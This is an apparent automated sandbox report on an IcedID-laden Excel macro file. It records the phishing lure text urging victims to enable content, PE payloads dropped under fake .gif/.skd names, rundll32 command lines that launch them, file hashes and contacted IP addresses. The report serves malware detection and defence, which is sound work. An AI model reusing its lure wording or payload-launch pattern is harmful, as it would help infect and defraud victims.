Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://a0.awsstatic.com/target/1.0.113/aws-target-mediator.js
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp String found in binary or memory: https://amazon.com/
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
Source: rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/?nc2=h_lg
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ar/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/cn/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/de/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/es/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/fr/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/id/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/it/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105903407.0000000000332000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/j
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/jp/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ko/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/marketplace?aws=hp
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/pt/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ru/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/search
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/search/
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/search/?searchQuery=
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/th/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/tr/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/tw/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/vi/
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/console/home
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://d1.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/AmazonECSAnywherePreview.html?hp=tile&amp;so-exp=below
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://press.aboutamazon.com/press-releases/aws
Source: rundll32.exe, 00000003.00000003.2105887933.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2170922422.0000000000367000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
Source: rundll32.exe, 00000003.00000002.2497730977.0000000000317000.00000004.00000020.sdmp, rundll32.exe, 00000006.00000003.2173075122.0000000000351000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/awscloud
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp String found in binary or memory: https://www.amazon.jobs/aws
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp String found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: https://www.twitch.tv/aws
Source: rundll32.exe, 00000003.00000003.2224598065.0000000000397000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.2188078366.0000000002A26000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown HTTPS traffic detected: 192.185.48.186:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.214.87:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.87.146.86:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.79.62.99:443 -> 192.168.2.22:49170 version: TLS 1.2

E-Banking Fraud:

barindex
Yara detected IcedID
Source: Yara match File source: 00000003.00000002.2497781112.000000000038E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2174963879.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172023641.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173003375.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2497738687.00000000002E1000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173701556.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172513544.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2796, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2540, type: MEMORY

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please I"' from
Source: Screenshot number: 8 Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 8 Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9 Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 15 Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
Source: Document image extraction number: 15 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
Source: Screenshot number: 12 Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 12 Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Found Excel 4.0 Macro with suspicious formulas
Source: document-1251000362.xlsm Initial sample: CALL
Source: document-1251000362.xlsm Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: document-1251000362.xlsm Initial sample: Sheet size: 36917
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3 Jump to dropped file
Contains functionality to call native functions
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_002313B8 NtQuerySystemInformation,RtlAllocateHeap, 3_2_002313B8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_001413B8 NtQuerySystemInformation,RtlAllocateHeap, 6_2_001413B8
Detected potential crypto function
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00231100 3_2_00231100
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000007FEF4611000 3_2_000007FEF4611000
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000007FEF4611610 3_2_000007FEF4611610
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000007FEF4611979 3_2_000007FEF4611979
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00141100 6_2_00141100
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000007FEF46AF93A 6_2_000007FEF46AF93A
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif A7B8E0DF5276942405D485EB808FA19B24E42D9758CACF1515028122755C2513
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif BF4D7AAF16DD3806DB0C54096EE9CAF23316C2A6C9D1F6ABC55B39215E88F685
Source: Joe Sandbox View Dropped File: C:\Users\user\ksjvoefv.skd A7B8E0DF5276942405D485EB808FA19B24E42D9758CACF1515028122755C2513
Source: Joe Sandbox View Dropped File: C:\Users\user\ksjvoefv.skd3 BF4D7AAF16DD3806DB0C54096EE9CAF23316C2A6C9D1F6ABC55B39215E88F685
Source: rundll32.exe, 00000003.00000002.2497882095.0000000001C90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2171558379.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2179373404.0000000001AD0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSM@11/20@856/6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$document-1251000362.xlsm Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC486.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer
Source: document-1251000362.xlsm Metadefender: Detection: 13%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd2,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd3,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd4,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd,DllRegisterServer Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd1,DllRegisterServer Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd2,DllRegisterServer Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd3,DllRegisterServer Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd4,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: C:\Windows\System32\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/media/image4.png
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/media/image3.png
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/media/image2.png
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: document-1251000362.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3 Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3 Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3 Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3 Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
